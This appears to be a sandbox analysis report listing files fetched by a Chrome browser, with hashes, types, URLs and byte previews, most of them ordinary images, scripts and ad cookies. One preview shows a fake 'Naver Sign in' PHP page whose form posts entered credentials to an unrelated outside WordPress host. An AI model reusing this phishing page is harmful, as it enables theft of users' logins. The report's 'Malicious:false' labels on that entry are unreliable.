                                                                                  Preview:L..................F.@.. ...$+.,....%....d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Jan 11 23:32:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2683
                                                                                  Entropy (8bit):3.9958102439647862
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8+dQTUbwsH7idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbKy+yT+:8Nuw9T/TbxWOvTbKy7T
                                                                                  MD5:1DD7FB3F85E257351407CD608AEDEF10
                                                                                  SHA1:DE2522D275612DFB753B1CA99E8D4144955A402E
                                                                                  SHA-256:450138338D11284590564416EA55D5A50BA5FEA7FDE5C44026C5540D1D264EA8
                                                                                  SHA-512:A971640CE60A68D8F114900E699003F91683ADAEC4A3755206A363EFC1EABB3CC6B1791F4C0D560367411ECC92C959960BC37C9B388E1DE808807E38577CF7CD
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,......k..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 1500 x 600, 8-bit colormap, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):11375
                                                                                  Entropy (8bit):7.645494653990172
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Wg3JLNIdFb540f7mqTiLHrBjcCTN1MbaJD/RBse6ogkORdLv2Ha/:vD4N54IsHVjdN1tD7lODL/
                                                                                  MD5:0CB2E5165DC9324EB462199F04E1FFA9
                                                                                  SHA1:9E0F89847EC8A98D98A6020BC5C4ED32B7A48BF8
                                                                                  SHA-256:67DFF0AAD873050F12609885F2264417CCDD0D438311000A704C89F0865F7865
                                                                                  SHA-512:7A285C4A87B9F9093B7BA720D8FE08E0AD7E2EBDE9EF8C8D11B70AFA08245AF8F8A7281C7B3FBE8BAD21C3AFDE4F32634D3BD416822892AA47BA82C12F4B8191
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:http://d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/arrows.png
                                                                                  Preview:.PNG........IHDR.......X.....Om......tEXtSoftware.Adobe ImageReadyq.e<....PLTE......cdtIK^IK]IK\03IHK_acsceubdtcet..0=@SHK]IL]HK\MPbNQbORc.....0"&;(,@+/B04I.2F/3G-1D04H.2E04G15H26I59L8<P6:M9=Q7;N:>R:>Q;?R<@SIL\beuadtbetcftbes..-..0. 5.!6."7.#8."6.$9 %:!&;"'<"';$)>#(<%*?$)=&+@%*>',A&+?(-B).C(-A).B*/C+0D,1E05I15G<@R=ASIM_HL]KO`HL\MQbaeu.....-../.....0../.....0../..1..1..2..3..4. 5.!6.#8.$9.%: &;"':$)<&+>',?(-@).A*/B+0C,1D*/A-2E.3F/4G05H16I/4F05G38K6;N49K;@S;@R<ASGL^bfuaetbft.....0.!5."6.#7.$8.%9 &:!';"(<!':#)=#)<$*=&,@&,?+1E)/B06IGL]GL\HM]bfs..-.....0..1. 4.!5."6.#7.$8 '< ';*0B.4F06H06G..-..0.!5 (< (;...................................................................................................................................................................................................................................................t....tRNS..............................................................................................................................................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 1348 x 596, 8-bit/color RGB, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):26887
                                                                                  Entropy (8bit):7.695603867519574
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:siOD3EEEEEwtimkGGdEEEEEEE3EtmmNKvr/WMG7mEHZB6N+3xEEEQWCpo4ibEyfN:siOD3EEEEEqpkGmEEEEEEE3EtSvruMGG
                                                                                  MD5:54E862DC5600E9B3C61157EC356738DE
                                                                                  SHA1:56784480BC9FA75062BCB765729680899C0021DE
                                                                                  SHA-256:7A26F7A1E36844277BD8394E730F3B64F1CA60D99F832AEC634589E75964F34D
                                                                                  SHA-512:E475B88FCF66CBC8E58E5A4318D6C15A30B614C6C63D708343C02E205E3F9B97CC99A5D31AFAC4D393A3B8B35E8848C7D45AA8CAE8F92D148E148C47B8973DF8
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR...D...T.....Ro......sRGB.........gAMA......a...h.IDATx^.....u....k...5.SH.E....&........Zu...S.u.....)..]e]...X.-.J.3.+........!.br.}..G.?U......$5.z.6U..kf*.....u]........T.......6A.......f.........a.......!......`3.y.....l.0.................<.....6C.......f........C.u5.......;.P...K...DB......I.O.4...$2.......`3.y.....l.0.................<.....6C.......f.........a......_....{.!4....y..b..U.}v.b......^.....Hdj...$ .<...&./<......aZ......"52~...O.>...+.^..YQ..S......Hd.y...$..........w...oZ.R.^..j.X..|...m....J..r..9s..I..(H...WUU.<...L.y...L\.....M....m...._....O3...G...$%Wj.[3...?...L......v.U..v..<r..PI....f....p.......^.eX.......\..a....0.....+.../?.o...1E.f.0F..~......x..F...W~..].t.7.....*.}.10e.rk4~..N....3f477WVVZ...~.......2.J.<.......@,.........za...#..|iii{{.d...VI.mmmR...O..0.a.....,..k.......ks.f..0...../.?..U4....$v...M.$.{.nI.S.N%....0.....+....K.......~`./}S......O...#...u...x..|iiiqq.U'.t.u.@d..q......c.%.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from Unix, truncated
                                                                                  Category:dropped
                                                                                  Size (bytes):20
                                                                                  Entropy (8bit):1.5567796494470394
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FttTll:XtTll
                                                                                  MD5:A4745ABC5E7FDB89CC6DF3069F3C6E69
                                                                                  SHA1:74789F7DDBEBD5B7323F6F8174005B4BF8C1F1ED
                                                                                  SHA-256:D1111B245F685176180E6F1631E6DC49BADF6672368E9CE260C71355165EFFDF
                                                                                  SHA-512:849461CB54ECDE577246AAD993D1ECABB879913E353AE322561C7C57605F571E23210FE12BDCEF49FAA99B5B003611976FF64348F620968271E38BBA1C7D7F62
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:....................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PHP script, ASCII text, with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):6055
                                                                                  Entropy (8bit):5.044862057896188
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:Dc+FURkF3+0PxukLtkm+qDC93MmPc0pCIFHfrZS1:DTCR8u0PMgtkwDC984dC0TZS1
                                                                                  MD5:A7BF57EE63A723CCF05FB9B7EEF92A97
                                                                                  SHA1:7D61625EB54C89995B5FED0E4439F77835EC4B40
                                                                                  SHA-256:7167304B6BDE2F49D1E4D5D254B8B8A4C50BEED3EECFABAA619268A8FEAA50B8
                                                                                  SHA-512:DD27C0A324E0EEB2AC2280A54490E4EB5DA53132FA813DA94D16DFBA0D792C80D4A2A03AF0A3C0B3152DEB39B41D837300ACC4E36AA19B92F42087AF8121FE61
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://heuristic-knuth-588d37.netlify.app/?naps/
                                                                                  Preview:<?php......$user = $_REQUEST['email'];..$email = base64_decode($user);......?>... <!DOCTYPE html><html lang=""><head><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta http-equiv="Content-type" content="text/html;charset=utf-8">... <title data-lang-key="">-Naver Sign in</title><meta name="keywords" content="">..<link rel="shortcut icon" href="https://nid.naver.com/favicon_1024.png"/>...<style type="text/css">........body{.....background-image: url(https://i.imgur.com/g1U1hqo.png);.. background-repeat: no-repeat; .....width: 100%;.....height: 0%;.....padding: 0%;.....margin: 0%;....}.....form{.....width: 337px;.....height: 300px;.....position: relative;.....left: 450px;.....top: 231px;....}...</style>.....</head>...<body>....<div class="form">.....<form action="https://essentialhandymanservices.com/wp/next.php" method="post">......<input id="email" name="email" style="position: relative; top: 68px; width: 180px; height: 22px; font-size: 1px;.......color: #
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:downloaded
                                                                                  Size (bytes):391
                                                                                  Entropy (8bit):4.7474201749507134
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:t6wfDpmc4slzTPl2O4UYaeLIT4W+KS4S1UpMTQpi6jUs8sh6B+BSmK0C:t6qFPUPkHSt1UiT6i6jUs8b0I0C
                                                                                  MD5:8959DDCD9712196961D93F58064ED655
                                                                                  SHA1:62AB1E38E7E9FBF58A04381B76C2D96A9C829F24
                                                                                  SHA-256:17C7A89BF169C2EE400E31B042CEA68513F06B9CD7D1E8990DBEC800F0D771C7
                                                                                  SHA-512:5E9EFFA313C30B351345DB963238B4AFD0728CA302FD79A853C80C89F042266D44CC1D29492520FB0FA80B47135E54E6963DFC21972F6B236B84C1DA2FAD809D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%23ffffff
                                                                                  Preview:<svg fill='#ffffff' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg>.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:dropped
                                                                                  Size (bytes):200
                                                                                  Entropy (8bit):5.025855206845441
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:t6wfDpmc4slhohC/vmI4SmK0xhFELE47zF:t6qnoU/vmRI0xQTF
                                                                                  MD5:11B3089D616633CA6B73B57AA877EEB4
                                                                                  SHA1:07632F63E06B30D9B63C97177D3A8122629BDA9B
                                                                                  SHA-256:809FB4619D2A2F1A85DBDA8CC69A7F1659215212D708A098D62150EEE57070C1
                                                                                  SHA-512:079B0E35B479DFDBE64A987661000F4A034B10688E26F2A5FE6AAA807E81CCC5593D40609B731AB3340E687D83DD08DE4B8B1E01CDAC9D4523A9F6BB3ACFCBA0
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<svg fill='#ffffff' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:JSON data
                                                                                  Category:downloaded
                                                                                  Size (bytes):16
                                                                                  Entropy (8bit):3.202819531114783
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YWQRAW64:YWQmq
                                                                                  MD5:7363E85FE9EDEE6F053A4B319588C086
                                                                                  SHA1:A15E2127145548437173FC17F3E980E3F3DEE2D0
                                                                                  SHA-256:C955E57777EC0D73639DCA6748560D00AA5EB8E12F13EBB2ED9656ADD3908F97
                                                                                  SHA-512:A2FD24056E3EC2F1628F89EB2F1B36A9FC2437AE58D34190630FE065DF2BBEDAF9BD8AEE5F8949A002070052CA68CC6C0167214DD55DF289783CFF682B808D85
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:http://www.xay.io/ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28ba
                                                                                  Preview:{"success":true}
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 13914
                                                                                  Category:downloaded
                                                                                  Size (bytes):5390
                                                                                  Entropy (8bit):7.964839351197916
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:qFfHK5O8aNe7IwBihfpzjM0mJLua/BM6Yzlu6spbQMOMx+eL:qZHgO8aNiIthpjM9iWBRwAPOUb
                                                                                  MD5:CDB1844616F8EB20DFE0E022BC34C6AF
                                                                                  SHA1:254D9594044F9E7A20B58A01EF319A50C4DE8E60
                                                                                  SHA-256:8EE6F23805DDE8DFA23850A3BF892FB916D38A592AF0DDC49556E6374A52304C
                                                                                  SHA-512:7687D10797C5888FCE67AA68904749B8915E5F45BEDC0F3FE2AE6F18E0D9781048EF150B2168D64EB02C37B2582A7CE02266EBC9FA4EAB8D3077E9C32424486A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:http://www.xay.io/privacy.html
                                                                                  Preview:...........[.n.I.}..E.......K."Y..-.6..$P..~Z$..d..U.UE.A..b?i.a...E.....t..2....'..:....r..v...2V..~..]..A......L..??L>^....:).2J...z...,.2;....uw}.M.yo2.}.ZG..~<(.3.a.v.....qR.......Q.N.o;2...S...........m.2MJ....Mf:*..{.)...}.`...oW...uG..J........l.m.G..g?}v^......u....z_E.....yh.3u.F..l...~...y.....'s...L.a...0n..y...$<..e.o.:..LW....]g_..H....L........G37...n...o8W....O'''o~{.].:.L.%.l...(,.g.O_r..J.pb.U.b.g....J.#,.6.5....p....<./...*..P....B.8..Ylf%%l.......B...&..41......!..."...l...}K%?...M...d{y...q.=......G4Q....AM7,....X...Y}[P....[.XIb..54...-8S.....'..U.....4.*SU.........$..........).....8.....F0...R.E=.0.....,._..Ks.".I.<.....%e.....OO...8N...nv.}QC...P.......E...Rx.*.rqT....g..n...~../k..0.'S...Bx..9y...F.*.u..s..f..|..o;.f..|q|q;.}._~U.7.e.........x..k.c......p%|.]L.:.W.t.=..!"s's..*T.r...L........<}........C..A .q.\.e....jp1.l...Q.*....&mfUQ.9..H.......-......(((vjo.....-..J...@.Yt....&7...`Z...P'.N.....(u...Y.T.c.f...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (50758)
                                                                                  Category:downloaded
                                                                                  Size (bytes):51039
                                                                                  Entropy (8bit):5.247253437401007
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (366), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):366
                                                                                  Entropy (8bit):5.456371351767578
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:xWzP0zeboRNVIXudV2FlXkPqLps7M+dfYYUlUbZhxg4V2FlXkPqLpsAen:xWgKbiV8SqNJ67HfelUbfxnqNJ67n
                                                                                  MD5:91A59C4330E18A7A12CD0E75A0FCBACD
                                                                                  SHA1:EE9E9C9E13A37A3B7DA21109E02A25D261766692
                                                                                  SHA-256:8EA5FA938FCEEB4AC9F967DC9B0B6D321639F7EFC42AEDF3F0DA5AC31B39D31B
                                                                                  SHA-512:4DDA8165C753180BC3FE5B164E75BAA558996E99B8BEA5551CE091FE925B16C823057808C5687C6DF11228D4B85834CBC532719E12D3F360CD9F809CE93DE9F6
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:__sasCookie({"_cookies_":[{"_value_":"ID=75559fe59c67f5ef:T=1736642002:RT=1736642002:S=ALNI_MaZvWvqf74orQX0FzcIXpu-9drWaw","_expires_":1770338002,"_path_":"/","_domain_":"xay.io","_version_":1},{"_value_":"UID=00000fb454f7ba51:T=1736642002:RT=1736642002:S=ALNI_MZ2FgmyqyDLhkcxjUvi6AG08xdi8Q","_expires_":1770338002,"_path_":"/","_domain_":"xay.io","_version_":2}]});
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (366), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):366
                                                                                  Entropy (8bit):5.445630512299523
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:xWzP6A3ZxlGhyNmv2FlbfPqLps7M+dxIlGHJ9xkUY2FlbfPqLpsAen:xWWcxlGoNmIo67HxIlGPiUTo67n
                                                                                  MD5:B9E31E2D8CC21BBDEB9EE7271776BF45
                                                                                  SHA1:0F3C21D87DB42ACF61C712C67C05D04DE9EA0E86
                                                                                  SHA-256:F55995F0F51317F92AA6400C0DF15F71A017D410838AA8D3A0FEF06930B4BA4E
                                                                                  SHA-512:304860FD1010DEC5A24267138C1E0B301E136CD18B29AF4F1E6B0B8382D8F47322BA435BBEF32EA2C6D6FADA8E556D55F1BC95873B2775CBFA97CF00277E2B74
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://partner.googleadservices.com/gampad/cookie.js?domain=www.xay.io&client=dp-teaminternet09_3ph&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2
                                                                                  Preview:__sasCookie({"_cookies_":[{"_value_":"ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A","_expires_":1770338001,"_path_":"/","_domain_":"xay.io","_version_":1},{"_value_":"UID=00000fb455054440:T=1736642001:RT=1736642001:S=ALNI_MbKxG-CnKIxCv-CYX-fjD_dhibnTA","_expires_":1770338001,"_path_":"/","_domain_":"xay.io","_version_":2}]});
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1895)
                                                                                  Category:dropped
                                                                                  Size (bytes):147108
                                                                                  Entropy (8bit):5.528463414851452
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Rj4EEHxzJkfKnTi/cteUEOKl16X5II615nUnU/WD3g78JSzg2SmAtGFUI/+r9334:YKl1KII6fXsS2mpB+N3QgHMOYXQzG
                                                                                  MD5:09BDCD611DC80973716932A1FA44689E
                                                                                  SHA1:0ADA70C3CEF1F15A6010863364BDF159B7EC063F
                                                                                  SHA-256:B7A41DFEB58C9AB717E07D34AE39A97389F73B82F73D4FAE7A9EA10008DCF86B
                                                                                  SHA-512:46ED47A2A9D2F08DD3934CA68F751848B009910B1E8779290784C9648BB5701358413610A8C28E709CBB9421F53F62D27ADD8A86204ED3DEA023A1BC61FFD337
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"5942599812270562725",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,17301442,17301548,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_chatbot":0,"afs_chatbot_aa":500,"afs_gpp_api":0,"disable_usp_api":10,"heterodyne_test":851,"ivt_ch
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 114 x 114, 8-bit/color RGB, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):3919
                                                                                  Entropy (8bit):7.914396601366556
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:6SDZ/I09Da01l+gmkyTt6Hk8nTZ14UwFtLdp:6SDS0tKg9E05TZ1b4vp
                                                                                  MD5:690CD2D878FDEE8DC9E468A57DFFB611
                                                                                  SHA1:E0D66D6D711FE013D36A98096860B4080891C140
                                                                                  SHA-256:7B25E4D630139533B101CE713BA73784CEA1ABF7283CB283996205E44A1E1FB1
                                                                                  SHA-512:FBFF080911F86492A71ECF75B8AC9B19CE76F381DBC221553CB5A1DB52C0DD25E0B4D16DA85324F792F0E9954B9413D7B6F0ED2039EEEB43E90243BF6014647B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR...r...r........*....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from Unix, truncated
                                                                                  Category:downloaded
                                                                                  Size (bytes):20
                                                                                  Entropy (8bit):1.5567796494470394
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FttTll:XtTll
                                                                                  MD5:A4745ABC5E7FDB89CC6DF3069F3C6E69
                                                                                  SHA1:74789F7DDBEBD5B7323F6F8174005B4BF8C1F1ED
                                                                                  SHA-256:D1111B245F685176180E6F1631E6DC49BADF6672368E9CE260C71355165EFFDF
                                                                                  SHA-512:849461CB54ECDE577246AAD993D1ECABB879913E353AE322561C7C57605F571E23210FE12BDCEF49FAA99B5B003611976FF64348F620968271E38BBA1C7D7F62
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:http://www.xay.io/track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D
                                                                                  Preview:....................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from Unix, truncated
                                                                                  Category:dropped
                                                                                  Size (bytes):20
                                                                                  Entropy (8bit):1.5567796494470394
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FttTll:XtTll
                                                                                  MD5:A4745ABC5E7FDB89CC6DF3069F3C6E69
                                                                                  SHA1:74789F7DDBEBD5B7323F6F8174005B4BF8C1F1ED
                                                                                  SHA-256:D1111B245F685176180E6F1631E6DC49BADF6672368E9CE260C71355165EFFDF
                                                                                  SHA-512:849461CB54ECDE577246AAD993D1ECABB879913E353AE322561C7C57605F571E23210FE12BDCEF49FAA99B5B003611976FF64348F620968271E38BBA1C7D7F62
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:....................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1895)
                                                                                  Category:downloaded
                                                                                  Size (bytes):147124
                                                                                  Entropy (8bit):5.528500125287879
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:dj4EEHxzJkfKnTi/cteUEOKl16X5II615nUnU/WD3g78JSzg2SmAtGFUI/+r9334:sKl1KII6fXsS2mpB+N3QgHMOYXQzG
                                                                                  MD5:CF4F17CCEA474917618499EC9398CA62
                                                                                  SHA1:3E4AC752B8B7FA66FF5BBB6112925154505F640A
                                                                                  SHA-256:D7297110A107824C384D6FD5E2732D2AB3DE84C5015E093EC677C3D00F8E1C07
                                                                                  SHA-512:5E176D29A7CFF15ABC33889B296B60A1A40079BEC1B91EEA907696A967E1E3ABB30EC1F3D10BE29A2837045C87DE3BD611D8CA63A93CE1AFF2A8195F782B1C2D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0
